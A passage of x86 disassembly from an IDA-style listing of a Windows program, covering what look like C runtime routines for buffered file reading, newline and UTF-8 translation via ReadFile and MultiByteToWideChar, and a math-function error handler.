push dword ptr [esi+18h]
push dword ptr [esi+8]
push esi
call sub_408A20
pop ecx
push eax
call sub_40A34F
add esp, 0Ch
cmp eax, edi
mov [esi+4], eax
jz loc_409D97
cmp eax, 0FFFFFFFFh
jz short loc_409D97
test byte ptr [esi+0Ch], 82h
jnz short loc_409D6D
push esi
call sub_408A20
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_409D58
push esi
call sub_408A20
cmp eax, 0FFFFFFFEh
pop ecx
jz short loc_409D58
push esi
call sub_408A20
sar eax, 5
push esi
lea edi, ds:433CA0h[eax*4]
call sub_408A20
and eax, 1Fh
imul eax, 28h
add eax, [edi]
pop ecx
pop ecx
jmp short loc_409D5D
; ---------------------------------------------------------------------------
loc_409D58: ; CODE XREF: sub_409C8D+9B�j
; sub_409C8D+A7�j
mov eax, offset dword_423BD0
loc_409D5D: ; CODE XREF: sub_409C8D+C9�j
mov al, [eax+4]
and al, 82h
cmp al, 82h
jnz short loc_409D6D
or dword ptr [esi+0Ch], 2000h
loc_409D6D: ; CODE XREF: sub_409C8D+8F�j
; sub_409C8D+D7�j
cmp dword ptr [esi+18h], 200h
jnz short loc_409D8A
mov eax, [esi+0Ch]
test al, 8
jz short loc_409D8A
test ax, 400h
jnz short loc_409D8A
mov dword ptr [esi+18h], 1000h
loc_409D8A: ; CODE XREF: sub_409C8D+E7�j
; sub_409C8D+EE�j ...
mov ecx, [esi]
dec dword ptr [esi+4]
movzx eax, byte ptr [ecx]
inc ecx
mov [esi], ecx
jmp short loc_409DAA
; ---------------------------------------------------------------------------
loc_409D97: ; CODE XREF: sub_409C8D+80�j
; sub_409C8D+89�j
neg eax
sbb eax, eax
and eax, 10h
add eax, 10h
or [esi+0Ch], eax
mov [esi+4], edi
loc_409DA7: ; CODE XREF: sub_409C8D+24�j
; sub_409C8D+2E�j ...
or eax, 0FFFFFFFFh
loc_409DAA: ; CODE XREF: sub_409C8D+108�j
pop edi
pop esi
retn
sub_409C8D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409DAD proc near ; CODE XREF: sub_40A34F+9A�p
; sub_40E072+355�p ...
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = word ptr -8
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 1Ch
mov edx, [ebp+arg_8]
push esi
mov esi, [ebp+arg_0]
push 0FFFFFFFEh
pop eax
cmp esi, eax
mov [ebp+var_14], eax
mov [ebp+var_1C], edx
jnz short loc_409DE2
call sub_4057E6
and dword ptr [eax], 0
call sub_4057D3
mov dword ptr [eax], 9
or eax, 0FFFFFFFFh
jmp loc_40A34C
; ---------------------------------------------------------------------------
loc_409DE2: ; CODE XREF: sub_409DAD+18�j
push edi
xor edi, edi
cmp esi, edi
jl short loc_409DF1
cmp esi, dword_433C84
jb short loc_409E18
loc_409DF1: ; CODE XREF: sub_409DAD+3A�j
call sub_4057E6
mov [eax], edi
call sub_4057D3
push edi
push edi
push edi
push edi
push edi
mov dword ptr [eax], 9
call sub_402F39
add esp, 14h
or eax, 0FFFFFFFFh
jmp loc_40A34B
; ---------------------------------------------------------------------------
loc_409E18: ; CODE XREF: sub_409DAD+42�j
mov eax, esi
and esi, 1Fh
imul esi, 28h
sar eax, 5
push ebx
lea ebx, ds:433CA0h[eax*4]
mov eax, [ebx]
add eax, esi
mov cl, [eax+4]
test cl, 1
jnz short loc_409E4E
call sub_4057E6
mov [eax], edi
call sub_4057D3
mov dword ptr [eax], 9
jmp loc_409F95
; ---------------------------------------------------------------------------
loc_409E4E: ; CODE XREF: sub_409DAD+88�j
cmp edx, edi
mov [ebp+var_10], edi
jz loc_40A348
test cl, 2
jnz loc_40A348
mov ecx, [ebp+arg_4]
cmp ecx, edi
jz loc_409F83
mov al, [eax+24h]
add al, al
sar al, 1
mov [ebp+var_2], al
movsx eax, al
dec eax
jz loc_409F7B
dec eax
jnz short loc_409E96
mov eax, edx
not eax
test al, 1
jz loc_409F83
and edx, 0FFFFFFFEh
mov [ebp+arg_8], edx
loc_409E96: ; CODE XREF: sub_409DAD+D5�j
mov [ebp+var_C], ecx
loc_409E99: ; CODE XREF: sub_409DAD+216�j
mov ecx, [ebx]
mov eax, [ebp+var_C]
lea edi, [esi+ecx]
test byte ptr [edi+4], 48h
jz short loc_409F1D
mov cl, [edi+5]
cmp cl, 0Ah
jz short loc_409F1D
xor edx, edx
cmp [ebp+arg_8], edx
jz short loc_409F1D
mov [eax], cl
mov ecx, [ebx]
inc eax
dec [ebp+arg_8]
cmp [ebp+var_2], dl
mov [ebp+var_10], 1
mov byte ptr [esi+ecx+5], 0Ah
jz short loc_409F1D
mov ecx, [ebx]
mov cl, [esi+ecx+25h]
cmp cl, 0Ah
jz short loc_409F1D
cmp [ebp+arg_8], edx
jz short loc_409F1D
mov [eax], cl
mov ecx, [ebx]
inc eax
dec [ebp+arg_8]
cmp [ebp+var_2], 1
mov [ebp+var_10], 2
mov byte ptr [esi+ecx+25h], 0Ah
jnz short loc_409F1D
mov ecx, [ebx]
mov cl, [esi+ecx+26h]
cmp cl, 0Ah
jz short loc_409F1D
cmp [ebp+arg_8], edx
jz short loc_409F1D
mov [eax], cl
mov ecx, [ebx]
inc eax
dec [ebp+arg_8]
mov [ebp+var_10], 3
mov byte ptr [esi+ecx+26h], 0Ah
loc_409F1D: ; CODE XREF: sub_409DAD+F8�j
; sub_409DAD+100�j ...
push 0
lea ecx, [ebp+var_18]
push ecx
push [ebp+arg_8]
push eax
mov eax, [ebx]
push dword ptr [esi+eax]
call ds:dword_41D078 ; ReadFile
test eax, eax
jz loc_40A312
mov edi, [ebp+var_18]
test edi, edi
jl loc_40A312
cmp edi, [ebp+arg_8]
ja loc_40A312
mov eax, [ebx]
add [ebp+var_10], edi
lea eax, [esi+eax+4]
test byte ptr [eax], 80h
jz loc_40A1B2
cmp [ebp+var_2], 2
jz loc_40A1DC
test edi, edi
jz short loc_409FE7
mov ecx, [ebp+var_C]
cmp byte ptr [ecx], 0Ah
jnz short loc_409FE7
or byte ptr [eax], 4
jmp short loc_409FEA
; ---------------------------------------------------------------------------
loc_409F7B: ; CODE XREF: sub_409DAD+CE�j
mov eax, edx
not eax
test al, 1
jnz short loc_409FA4
loc_409F83: ; CODE XREF: sub_409DAD+BA�j
; sub_409DAD+DD�j
call sub_4057E6
mov [eax], edi
call sub_4057D3
mov dword ptr [eax], 16h
loc_409F95: ; CODE XREF: sub_409DAD+9C�j
push edi
push edi
push edi
push edi
push edi
call sub_402F39
add esp, 14h
jmp short loc_409FDF
; ---------------------------------------------------------------------------
loc_409FA4: ; CODE XREF: sub_409DAD+1D4�j
mov eax, edx
push 4
pop ecx
shr eax, 1
cmp eax, ecx
mov [ebp+arg_8], ecx
jb short loc_409FB5
mov [ebp+arg_8], eax
loc_409FB5: ; CODE XREF: sub_409DAD+203�j
push [ebp+arg_8]
call sub_40773A
cmp eax, edi
pop ecx
mov [ebp+var_C], eax
jnz loc_409E99
call sub_4057D3
mov dword ptr [eax], 0Ch
call sub_4057E6
mov dword ptr [eax], 8
loc_409FDF: ; CODE XREF: sub_409DAD+1F5�j
or eax, 0FFFFFFFFh
jmp loc_40A34A
; ---------------------------------------------------------------------------
loc_409FE7: ; CODE XREF: sub_409DAD+1BF�j
; sub_409DAD+1C7�j
and byte ptr [eax], 0FBh
loc_409FEA: ; CODE XREF: sub_409DAD+1CC�j
mov edi, [ebp+var_C]
mov eax, [ebp+var_10]
add eax, edi
cmp edi, eax
mov [ebp+arg_8], edi
mov [ebp+var_10], eax
jnb loc_40A0D0
loc_40A000: ; CODE XREF: sub_409DAD+306�j
mov ecx, [ebp+arg_8]
mov al, [ecx]
cmp al, 1Ah
jz loc_40A0BB
cmp al, 0Dh
jz short loc_40A01D
mov [edi], al
inc edi
inc ecx
mov [ebp+arg_8], ecx
jmp loc_40A0AD
; ---------------------------------------------------------------------------
loc_40A01D: ; CODE XREF: sub_409DAD+262�j
mov eax, [ebp+var_10]
dec eax
cmp ecx, eax
jnb short loc_40A03C
lea eax, [ecx+1]
cmp byte ptr [eax], 0Ah
jnz short loc_40A037
inc ecx
inc ecx
mov [ebp+arg_8], ecx
loc_40A032: ; CODE XREF: sub_409DAD+2CA�j
; sub_409DAD+2E3�j
mov byte ptr [edi], 0Ah
jmp short loc_40A0AC
; ---------------------------------------------------------------------------
loc_40A037: ; CODE XREF: sub_409DAD+27E�j
mov [ebp+arg_8], eax
jmp short loc_40A0A9
; ---------------------------------------------------------------------------
loc_40A03C: ; CODE XREF: sub_409DAD+276�j
inc [ebp+arg_8]
push 0
lea eax, [ebp+var_18]
push eax
push 1
lea eax, [ebp+var_1]
push eax
mov eax, [ebx]
push dword ptr [esi+eax]
call ds:dword_41D078 ; ReadFile
test eax, eax
jnz short loc_40A064
call ds:dword_41D0F0 ; RtlGetLastWin32Error
test eax, eax
jnz short loc_40A0A9
loc_40A064: ; CODE XREF: sub_409DAD+2AB�j
cmp [ebp+var_18], 0
jz short loc_40A0A9
mov eax, [ebx]
test byte ptr [esi+eax+4], 48h
jz short loc_40A087
cmp [ebp+var_1], 0Ah
jz short loc_40A032
mov byte ptr [edi], 0Dh
mov eax, [ebx]
mov cl, [ebp+var_1]
mov [esi+eax+5], cl
jmp short loc_40A0AC
; ---------------------------------------------------------------------------
loc_40A087: ; CODE XREF: sub_409DAD+2C4�j
cmp edi, [ebp+var_C]
jnz short loc_40A092
cmp [ebp+var_1], 0Ah
jz short loc_40A032
loc_40A092: ; CODE XREF: sub_409DAD+2DD�j
push 1
push 0FFFFFFFFh
push 0FFFFFFFFh
push [ebp+arg_0]
call sub_40CCBE
add esp, 10h
cmp [ebp+var_1], 0Ah
jz short loc_40A0AD
loc_40A0A9: ; CODE XREF: sub_409DAD+28D�j
; sub_409DAD+2B5�j ...
mov byte ptr [edi], 0Dh
loc_40A0AC: ; CODE XREF: sub_409DAD+288�j
; sub_409DAD+2D8�j
inc edi
loc_40A0AD: ; CODE XREF: sub_409DAD+26B�j
; sub_409DAD+2FA�j
mov eax, [ebp+var_10]
cmp [ebp+arg_8], eax
jb loc_40A000
jmp short loc_40A0D0
; ---------------------------------------------------------------------------
loc_40A0BB: ; CODE XREF: sub_409DAD+25A�j
mov eax, [ebx]
lea eax, [esi+eax+4]
test byte ptr [eax], 40h
jnz short loc_40A0CB
or byte ptr [eax], 2
jmp short loc_40A0D0
; ---------------------------------------------------------------------------
loc_40A0CB: ; CODE XREF: sub_409DAD+317�j
mov al, [ecx]
mov [edi], al
inc edi
loc_40A0D0: ; CODE XREF: sub_409DAD+24D�j
; sub_409DAD+30C�j ...
mov eax, edi
sub eax, [ebp+var_C]
cmp [ebp+var_2], 1
mov [ebp+var_10], eax
jnz loc_40A1B2
test eax, eax
jz loc_40A1B2
dec edi
mov cl, [edi]
test cl, cl
js short loc_40A0F7
inc edi
jmp loc_40A17D
; ---------------------------------------------------------------------------
loc_40A0F7: ; CODE XREF: sub_409DAD+342�j
xor eax, eax
inc eax
movzx ecx, cl
jmp short loc_40A10E
; ---------------------------------------------------------------------------
loc_40A0FF: ; CODE XREF: sub_409DAD+368�j
cmp eax, 4
jg short loc_40A117
cmp edi, [ebp+var_C]
jb short loc_40A117
dec edi
movzx ecx, byte ptr [edi]
inc eax
loc_40A10E: ; CODE XREF: sub_409DAD+350�j
cmp byte_423CB8[ecx], 0
jz short loc_40A0FF
loc_40A117: ; CODE XREF: sub_409DAD+355�j
; sub_409DAD+35A�j
mov dl, [edi]
movzx ecx, dl
movsx ecx, byte_423CB8[ecx]
test ecx, ecx
jnz short loc_40A134
call sub_4057D3
mov dword ptr [eax], 2Ah
jmp short loc_40A1AE
; ---------------------------------------------------------------------------
loc_40A134: ; CODE XREF: sub_409DAD+378�j
inc ecx
cmp ecx, eax
jnz short loc_40A13D
add edi, eax
jmp short loc_40A17D
; ---------------------------------------------------------------------------
loc_40A13D: ; CODE XREF: sub_409DAD+38A�j
mov ecx, [ebx]
add ecx, esi
test byte ptr [ecx+4], 48h
jz short loc_40A16B
inc edi
cmp eax, 2
mov [ecx+5], dl
jl short loc_40A159
mov dl, [edi]
mov ecx, [ebx]
mov [esi+ecx+25h], dl
inc edi
loc_40A159: ; CODE XREF: sub_409DAD+3A1�j
cmp eax, 3
jnz short loc_40A167
mov dl, [edi]
mov ecx, [ebx]
mov [esi+ecx+26h], dl
inc edi
loc_40A167: ; CODE XREF: sub_409DAD+3AF�j
sub edi, eax
jmp short loc_40A17D
; ---------------------------------------------------------------------------
loc_40A16B: ; CODE XREF: sub_409DAD+398�j
neg eax
cdq
push 1
push edx
push eax
push [ebp+arg_0]
call sub_40CCBE
add esp, 10h
loc_40A17D: ; CODE XREF: sub_409DAD+345�j
; sub_409DAD+38E�j ...
mov eax, [ebp+var_1C]
sub edi, [ebp+var_C]
shr eax, 1
push eax
push [ebp+arg_4]
push edi
push [ebp+var_C]
push 0
push 0FDE9h
call ds:dword_41D0A0 ; MultiByteToWideChar
test eax, eax
mov [ebp+var_10], eax
jnz short loc_40A1D5
call ds:dword_41D0F0 ; RtlGetLastWin32Error
loc_40A1A7: ; CODE XREF: sub_409DAD+58C�j
push eax
call sub_4057F9
pop ecx
loc_40A1AE: ; CODE XREF: sub_409DAD+385�j
; sub_409DAD+584�j
or [ebp+var_14], 0FFFFFFFFh
loc_40A1B2: ; CODE XREF: sub_409DAD+1AD�j
; sub_409DAD+32F�j ...
mov eax, [ebp+var_C]
cmp eax, [ebp+arg_4]
jz short loc_40A1C1
push eax
call sub_403603
pop ecx
loc_40A1C1: ; CODE XREF: sub_409DAD+40B�j
mov eax, [ebp+var_14]
cmp eax, 0FFFFFFFEh
jnz loc_40A34A
mov eax, [ebp+var_10]
jmp loc_40A34A
; ---------------------------------------------------------------------------
loc_40A1D5: ; CODE XREF: sub_409DAD+3F2�j
add eax, eax
mov [ebp+var_10], eax
jmp short loc_40A1B2
; ---------------------------------------------------------------------------
loc_40A1DC: ; CODE XREF: sub_409DAD+1B7�j
test edi, edi
jz short loc_40A1EE
mov ecx, [ebp+var_C]
cmp word ptr [ecx], 0Ah
jnz short loc_40A1EE
or byte ptr [eax], 4
jmp short loc_40A1F1
; ---------------------------------------------------------------------------
loc_40A1EE: ; CODE XREF: sub_409DAD+431�j
; sub_409DAD+43A�j
and byte ptr [eax], 0FBh
loc_40A1F1: ; CODE XREF: sub_409DAD+43F�j
mov edi, [ebp+var_C]
mov eax, [ebp+var_10]
add eax, edi
cmp edi, eax
mov [ebp+arg_8], edi
mov [ebp+var_10], eax
jnb loc_40A307
loc_40A207: ; CODE XREF: sub_409DAD+53A�j
mov eax, [ebp+arg_8]
movzx ecx, word ptr [eax]
cmp cx, 1Ah
jz loc_40A2EF
cmp cx, 0Dh
jz short loc_40A22C
mov [edi], cx
inc edi
inc edi
inc eax
inc eax
mov [ebp+arg_8], eax
jmp loc_40A2E1
; ---------------------------------------------------------------------------
loc_40A22C: ; CODE XREF: sub_409DAD+46E�j
mov ecx, [ebp+var_10]
add ecx, 0FFFFFFFEh
cmp eax, ecx
jnb short loc_40A257
lea ecx, [eax+2]
cmp word ptr [ecx], 0Ah
jnz short loc_40A24F
add eax, 4
mov [ebp+arg_8], eax
loc_40A245: ; CODE XREF: sub_409DAD+4E7�j
; sub_409DAD+513�j
mov word ptr [edi], 0Ah
jmp loc_40A2DF
; ---------------------------------------------------------------------------
loc_40A24F: ; CODE XREF: sub_409DAD+490�j
mov [ebp+arg_8], ecx
jmp loc_40A2DA
; ---------------------------------------------------------------------------
loc_40A257: ; CODE XREF: sub_409DAD+487�j
add [ebp+arg_8], 2
push 0
lea eax, [ebp+var_18]
push eax
push 2
lea eax, [ebp+var_8]
push eax
mov eax, [ebx]
push dword ptr [esi+eax]
call ds:dword_41D078 ; ReadFile
test eax, eax
jnz short loc_40A280
call ds:dword_41D0F0 ; RtlGetLastWin32Error
test eax, eax
jnz short loc_40A2DA
loc_40A280: ; CODE XREF: sub_409DAD+4C7�j
cmp [ebp+var_18], 0
jz short loc_40A2DA
mov eax, [ebx]
test byte ptr [esi+eax+4], 48h
jz short loc_40A2B6
cmp [ebp+var_8], 0Ah
jz short loc_40A245
mov word ptr [edi], 0Dh
mov eax, [ebx]
mov cl, byte ptr [ebp+var_8]
mov [esi+eax+5], cl
mov eax, [ebx]
mov cl, byte ptr [ebp+var_8+1]
mov [esi+eax+25h], cl
mov eax, [ebx]
mov byte ptr [esi+eax+26h], 0Ah
jmp short loc_40A2DF
; ---------------------------------------------------------------------------
loc_40A2B6: ; CODE XREF: sub_409DAD+4E0�j
cmp edi, [ebp+var_C]
jnz short loc_40A2C2
cmp [ebp+var_8], 0Ah
jz short loc_40A245
loc_40A2C2: ; CODE XREF: sub_409DAD+50C�j
push 1
push 0FFFFFFFFh
push 0FFFFFFFEh
push [ebp+arg_0]
call sub_40CCBE
add esp, 10h
cmp [ebp+var_8], 0Ah
jz short loc_40A2E1
loc_40A2DA: ; CODE XREF: sub_409DAD+4A5�j
; sub_409DAD+4D1�j ...
mov word ptr [edi], 0Dh
loc_40A2DF: ; CODE XREF: sub_409DAD+49D�j
; sub_409DAD+507�j
inc edi
inc edi
loc_40A2E1: ; CODE XREF: sub_409DAD+47A�j
; sub_409DAD+52B�j
mov eax, [ebp+var_10]
cmp [ebp+arg_8], eax
jb loc_40A207
jmp short loc_40A307
; ---------------------------------------------------------------------------
loc_40A2EF: ; CODE XREF: sub_409DAD+464�j
mov ecx, [ebx]
lea esi, [esi+ecx+4]
test byte ptr [esi], 40h
jnz short loc_40A2FF
or byte ptr [esi], 2
jmp short loc_40A307
; ---------------------------------------------------------------------------
loc_40A2FF: ; CODE XREF: sub_409DAD+54B�j
mov ax, [eax]
mov [edi], ax
inc edi
inc edi
loc_40A307: ; CODE XREF: sub_409DAD+454�j
; sub_409DAD+540�j ...
sub edi, [ebp+var_C]
mov [ebp+var_10], edi
jmp loc_40A1B2
; ---------------------------------------------------------------------------
loc_40A312: ; CODE XREF: sub_409DAD+187�j
; sub_409DAD+192�j ...
call ds:dword_41D0F0 ; RtlGetLastWin32Error
push 5
pop esi
cmp eax, esi
jnz short loc_40A336
call sub_4057D3
mov dword ptr [eax], 9
call sub_4057E6
mov [eax], esi
jmp loc_40A1AE
; ---------------------------------------------------------------------------
loc_40A336: ; CODE XREF: sub_409DAD+570�j
cmp eax, 6Dh
jnz loc_40A1A7
and [ebp+var_14], 0
jmp loc_40A1B2
; ---------------------------------------------------------------------------
loc_40A348: ; CODE XREF: sub_409DAD+A6�j
; sub_409DAD+AF�j
xor eax, eax
loc_40A34A: ; CODE XREF: sub_409DAD+235�j
; sub_409DAD+41A�j ...
pop ebx
loc_40A34B: ; CODE XREF: sub_409DAD+66�j
pop edi
loc_40A34C: ; CODE XREF: sub_409DAD+30�j
pop esi
leave
retn
sub_409DAD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A34F proc near ; CODE XREF: sub_403B22+C9�p
; sub_409C8D+73�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push 10h
push offset dword_4215C0
call __SEH_prolog4
mov eax, [ebp+arg_0]
cmp eax, 0FFFFFFFEh
jnz short loc_40A37E
call sub_4057E6
and dword ptr [eax], 0
call sub_4057D3
mov dword ptr [eax], 9
loc_40A376: ; CODE XREF: sub_40A34F+5C�j
or eax, 0FFFFFFFFh
jmp loc_40A41B
; ---------------------------------------------------------------------------
loc_40A37E: ; CODE XREF: sub_40A34F+12�j
xor edi, edi
cmp eax, edi
jl short loc_40A38C
cmp eax, dword_433C84
jb short loc_40A3AD
loc_40A38C: ; CODE XREF: sub_40A34F+33�j
; sub_40A34F+7C�j
call sub_4057E6
mov [eax], edi
call sub_4057D3
mov dword ptr [eax], 9
push edi
push edi
push edi
push edi
push edi
call sub_402F39
add esp, 14h
jmp short loc_40A376
; ---------------------------------------------------------------------------
loc_40A3AD: ; CODE XREF: sub_40A34F+3B�j
mov ecx, eax
sar ecx, 5
lea ebx, ds:433CA0h[ecx*4]
mov esi, eax
and esi, 1Fh
imul esi, 28h
mov ecx, [ebx]
movzx ecx, byte ptr [ecx+esi+4]
and ecx, 1
jz short loc_40A38C
push eax
call sub_40EDEE
pop ecx
mov [ebp+ms_exc.disabled], edi
mov eax, [ebx]
test byte ptr [eax+esi+4], 1
jz short loc_40A3F6
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409DAD
add esp, 0Ch
mov [ebp+var_1C], eax
jmp short loc_40A40C
; ---------------------------------------------------------------------------
loc_40A3F6: ; CODE XREF: sub_40A34F+8F�j
call sub_4057D3
mov dword ptr [eax], 9
call sub_4057E6
mov [eax], edi
or [ebp+var_1C], 0FFFFFFFFh
loc_40A40C: ; CODE XREF: sub_40A34F+A5�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40A421
mov eax, [ebp+var_1C]
loc_40A41B: ; CODE XREF: sub_40A34F+2A�j
call __SEH_epilog4
retn
sub_40A34F endp
; =============== S U B R O U T I N E =======================================
sub_40A421 proc near ; CODE XREF: sub_40A34F+C4�p
; DATA XREF: .rdata:004215D8�o
push dword ptr [ebp+8]
call sub_40EE8E
pop ecx
retn
sub_40A421 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A42B proc near ; CODE XREF: sub_403DA0+B5�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = qword ptr -20h
var_18 = qword ptr -18h
var_10 = qword ptr -10h
var_8 = qword ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 28h
xor eax, eax
cmp dword_4262F0, eax
push ebx
mov ebx, [ebp+arg_4]
push esi
mov esi, [ebp+arg_8]
push edi
mov edi, [ebp+arg_0]
mov byte ptr [ebp+var_8], al
mov byte ptr [ebp+var_8+1], al
mov byte ptr [ebp+var_8+2], al
mov byte ptr [ebp+var_8+3], al
mov byte ptr [ebp+var_8+4], al
mov byte ptr [ebp+var_8+5], al
mov byte ptr [ebp+var_8+6], al
mov byte ptr [ebp+var_8+7], al
jz short loc_40A46D
push dword_433C80
call sub_405193
pop ecx
jmp short loc_40A472
; ---------------------------------------------------------------------------
loc_40A46D: ; CODE XREF: sub_40A42B+32�j
mov eax, offset sub_40F708
loc_40A472: ; CODE XREF: sub_40A42B+40�j
mov ecx, [ebp+arg_C]
mov edx, 0A6h
cmp ecx, edx
jg loc_40A5F6
jz loc_40A5E3
cmp ecx, 19h
jg loc_40A589
jz loc_40A580
mov edx, ecx
push 2
pop ecx
sub edx, ecx
jz loc_40A571
dec edx
jz loc_40A568
sub edx, 5
jz loc_40A559
dec edx
jz loc_40A541
sub edx, 5
jz short loc_40A531
dec edx
jz short loc_40A508
sub edx, 9
jnz loc_40A6A0 ; default
mov [ebp+var_28], 3
loc_40A4D3: ; CODE XREF: sub_40A42B+1AC�j
mov [ebp+var_24], offset aPow ; "pow"
loc_40A4DA: ; CODE XREF: sub_40A42B+114�j
; sub_40A42B+138�j ...
fld qword ptr [edi]
lea ecx, [ebp+var_28]
fstp [ebp+var_20]
push ecx
fld qword ptr [ebx]
fstp [ebp+var_18]
fld qword ptr [esi]
fstp [ebp+var_10]
call eax
test eax, eax
pop ecx
jnz loc_40A69B
call sub_4057D3
mov dword ptr [eax], 22h
jmp loc_40A69B
; ---------------------------------------------------------------------------
loc_40A508: ; CODE XREF: sub_40A42B+96�j
mov [ebp+var_24], offset aExp ; "exp"
loc_40A50F: ; CODE XREF: sub_40A42B+15C�j
fld qword ptr [edi]
lea ecx, [ebp+var_28]
fstp [ebp+var_20]
push ecx
fld qword ptr [ebx]
mov [ebp+var_28], 4
fstp [ebp+var_18]
fld qword ptr [esi]
fstp [ebp+var_10]
call eax
pop ecx
jmp loc_40A69B
; ---------------------------------------------------------------------------
loc_40A531: ; CODE XREF: sub_40A42B+93�j
mov [ebp+var_28], 3
mov [ebp+var_24], offset aExp ; "exp"
jmp short loc_40A4DA
; ---------------------------------------------------------------------------
loc_40A541: ; CODE XREF: sub_40A42B+8A�j
mov [ebp+var_24], offset aLog10 ; "log10"
loc_40A548: ; CODE XREF: sub_40A42B+144�j
; sub_40A42B+181�j ...
fld qword ptr [edi]
fstp [ebp+var_20]
fld qword ptr [ebx]
fstp [ebp+var_18]
fld qword ptr [esi]
jmp loc_40A67B
; ---------------------------------------------------------------------------
loc_40A559: ; CODE XREF: sub_40A42B+83�j
mov [ebp+var_28], ecx
mov [ebp+var_24], offset aLog10 ; "log10"
jmp loc_40A4DA
; ---------------------------------------------------------------------------
loc_40A568: ; CODE XREF: sub_40A42B+7A�j
mov [ebp+var_24], offset aLog ; "log"
jmp short loc_40A548
; ---------------------------------------------------------------------------
loc_40A571: ; CODE XREF: sub_40A42B+73�j
mov [ebp+var_28], ecx
mov [ebp+var_24], offset aLog ; "log"
jmp loc_40A4DA
; ---------------------------------------------------------------------------
loc_40A580: ; CODE XREF: sub_40A42B+66�j
mov [ebp+var_24], offset aPow ; "pow"
jmp short loc_40A50F
; ---------------------------------------------------------------------------
loc_40A589: ; CODE XREF: sub_40A42B+60�j
sub ecx, 1Ah
jz short loc_40A5DC
dec ecx
jz short loc_40A5D0
dec ecx
jz short loc_40A5C4 ; jumptable 0040A605 case 1006
dec ecx
jz short loc_40A5B7
sub ecx, 1Dh
jz short loc_40A5AE ; jumptable 0040A605 case 1008
sub ecx, 3
jnz loc_40A6A0 ; default
loc_40A5A5: ; CODE XREF: sub_40A42B+1DA�j
; DATA XREF: .text:off_40A6A7�o
mov [ebp+var_24], offset aAsin ; jumptable 0040A605 case 1009
jmp short loc_40A548
; ---------------------------------------------------------------------------
loc_40A5AE: ; CODE XREF: sub_40A42B+16F�j
; sub_40A42B+1DA�j
; DATA XREF: ...
mov [ebp+var_24], offset aAcos ; jumptable 0040A605 case 1008
jmp short loc_40A548
; ---------------------------------------------------------------------------
loc_40A5B7: ; CODE XREF: sub_40A42B+16A�j
mov [ebp+var_24], offset aPow ; "pow"
loc_40A5BE: ; CODE XREF: sub_40A42B+1E8�j
; sub_40A42B+1F1�j ...
fld qword ptr [edi]
fstp qword ptr [esi]
jmp short loc_40A548
; ---------------------------------------------------------------------------
loc_40A5C4: ; CODE XREF: sub_40A42B+167�j
; sub_40A42B+1DA�j
; DATA XREF: ...
mov [ebp+var_24], offset aPow ; jumptable 0040A605 case 1006
jmp loc_40A548
; ---------------------------------------------------------------------------
loc_40A5D0: ; CODE XREF: sub_40A42B+164�j
mov [ebp+var_28], 2
jmp loc_40A4D3
; ---------------------------------------------------------------------------
loc_40A5DC: ; CODE XREF: sub_40A42B+161�j
fld1
jmp loc_40A69E
; ---------------------------------------------------------------------------
loc_40A5E3: ; CODE XREF: sub_40A42B+57�j
mov [ebp+var_28], 3
mov [ebp+var_24], offset aExp10 ; "exp10"
jmp loc_40A4DA
; ---------------------------------------------------------------------------
loc_40A5F6: ; CODE XREF: sub_40A42B+51�j
add ecx, 0FFFFFC18h ; switch 13 cases
cmp ecx, 0Ch
ja loc_40A6A0 ; default
jmp ds:off_40A6A7[ecx*4] ; switch jump
loc_40A60C: ; DATA XREF: .text:off_40A6A7�o
mov [ebp+var_24], offset aLog ; jumptable 0040A605 case 1000
jmp short loc_40A5BE
; ---------------------------------------------------------------------------
loc_40A615: ; CODE XREF: sub_40A42B+1DA�j
; DATA XREF: .text:off_40A6A7�o
mov [ebp+var_24], offset aLog10 ; jumptable 0040A605 case 1001
jmp short loc_40A5BE
; ---------------------------------------------------------------------------
loc_40A61E: ; CODE XREF: sub_40A42B+1DA�j
; DATA XREF: .text:off_40A6A7�o
mov [ebp+var_24], offset aExp ; jumptable 0040A605 case 1002
jmp short loc_40A5BE
; ---------------------------------------------------------------------------
loc_40A627: ; CODE XREF: sub_40A42B+1DA�j
; DATA XREF: .text:off_40A6A7�o
mov [ebp+var_24], offset aAtan ; jumptable 0040A605 case 1003
jmp short loc_40A5BE
; ---------------------------------------------------------------------------
loc_40A630: ; CODE XREF: sub_40A42B+1DA�j
; DATA XREF: .text:off_40A6A7�o
mov [ebp+var_24], offset aCeil ; jumptable 0040A605 case 1004
jmp short loc_40A5BE
; ---------------------------------------------------------------------------
loc_40A639: ; CODE XREF: sub_40A42B+1DA�j
; DATA XREF: .text:off_40A6A7�o
mov [ebp+var_24], offset aFloor ; jumptable 0040A605 case 1005
jmp loc_40A5BE
; ---------------------------------------------------------------------------
loc_40A645: ; CODE XREF: sub_40A42B+1DA�j
; DATA XREF: .text:off_40A6A7�o
mov [ebp+var_24], offset aModf ; jumptable 0040A605 case 1007
jmp loc_40A5BE
; ---------------------------------------------------------------------------
loc_40A651: ; CODE XREF: sub_40A42B+1DA�j
; DATA XREF: .text:off_40A6A7�o
mov [ebp+var_24], offset dword_41DBC0 ; jumptable 0040A605 case 1010
jmp short loc_40A66A
; ---------------------------------------------------------------------------
loc_40A65A: ; CODE XREF: sub_40A42B+1DA�j
; DATA XREF: .text:off_40A6A7�o
mov [ebp+var_24], offset dword_41DBBC ; jumptable 0040A605 case 1011
jmp short loc_40A66A
; ---------------------------------------------------------------------------
loc_40A663: ; CODE XREF: sub_40A42B+1DA�j
; DATA XREF: .text:off_40A6A7�o
mov [ebp+var_24], offset dword_41DBB8 ; jumptable 0040A605 case 1012
